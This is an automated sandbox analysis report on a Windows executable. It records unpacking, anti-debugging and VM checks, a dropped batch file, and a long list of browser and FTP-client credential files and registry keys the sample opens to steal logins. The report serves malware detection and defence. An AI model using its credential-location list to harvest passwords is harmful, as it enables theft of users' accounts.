Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: samcli.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: msi.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: pstorec.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: ieframe.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: mlang.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: napinsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: pnrpnsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: wshbth.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: nlaapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: winrnr.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: samlib.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll			Jump to behavior

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Data Obfuscation

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Unpacked PE file: 1.2.BW38j8Jkbl.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;

Source: Yara match	File source: 0.2.BW38j8Jkbl.exe.4296000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,

1_2_00410065

Source: BW38j8Jkbl.exe

Static PE information: real checksum: 0xa2107 should be: 0xa18ac

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 0_2_00402D58 push cs; retf

0_2_00402D72

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

File dump: 6000093.bat.1.dr 3880EEB1C736D853EB13B44898B718AB

Jump to dropped file

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_004051E3 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,		1_2_004051E3
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_004041A6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,		1_2_004041A6
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00404E73 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,		1_2_00404E73
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00408AE5 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,		1_2_00408AE5
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00409832 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,		1_2_00409832
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00408961 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,		1_2_00408961

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

1_2_004045FD

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\			Jump to behavior

Source: BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
Source: BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\r[

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	API call chain: ExitProcess graph end node

Anti Debugging

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,

1_2_00410065

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 0_2_022C0974 mov eax, dword ptr fs:[00000030h]		0_2_022C0974
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 0_2_022C02B3 mov ebx, dword ptr fs:[00000030h]		0_2_022C02B3
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 0_2_022C09DD mov eax, dword ptr fs:[00000030h]		0_2_022C09DD
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_0040F990 mov eax, dword ptr fs:[00000030h]		1_2_0040F990

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_004105D6 SetUnhandledExceptionFilter,RevertToSelf,

1_2_004105D6

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_0041032D lstrcmpiA,LogonUserA,lstrlen,LCMapStringA,LogonUserA,LogonUserA,746B1B10,ImpersonateLoggedOnUser,RevertToSelf,746A5030,CloseHandle,

1_2_0041032D

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process created: C:\Users\user\Desktop\BW38j8Jkbl.exe "C:\Users\user\Desktop\BW38j8Jkbl.exe"			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "			Jump to behavior

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_004044D2 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_004044D2

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

1_2_004045FD

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_0041051E OleInitialize,GetUserNameA,

1_2_0041051E

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

1_2_004045FD

Stealing of Sensitive Information

Source: Yara match

File source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR

Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Jump to behavior

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\wcx_ftp.ini			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\SharedSettings.ccs			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\Frigate3\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FTP Explorer\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\SiteDesigner\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\SharedSettings_1_0_5.ccs			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\TurboFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\CuteFTP\sm.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\BlazeFtp\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\RhinoSoft.com\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings.ccs			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\TurboFTP			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\CuteFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FTPInfo\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBIT			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.js			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\NetSarang\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\BitKinex\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xml			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\LeapWare\LeapFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\GPSoftware\Directory Opus\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\BitKinex\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccs			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\AceBIT			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\History.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FTPInfo\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FileZilla\filezilla.xml			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccs			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\BitKinex\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\SharedSettings_1_0_5.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Program Files (x86)\CuteFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\SharedSettings.ccs			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\History.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\SmartFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\GHISLER\wcx_ftp.ini			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\ExpanDrive\drives.js			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\BlazeFtp\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FlashFXP\4\Sites.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\INSoftware\NovaFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FTP Explorer\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FTPGetter\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Program Files (x86)\CuteFTP\sm.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\NetSarang\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\CuteFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTP			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\CuteFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\SmartFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\TurboFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccs			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\Frigate3\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\Setup			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccs			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\AceBIT\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FileZilla\sitemanager.xml			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\TurboFTP\			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\RhinoSoft.com\			Jump to behavior
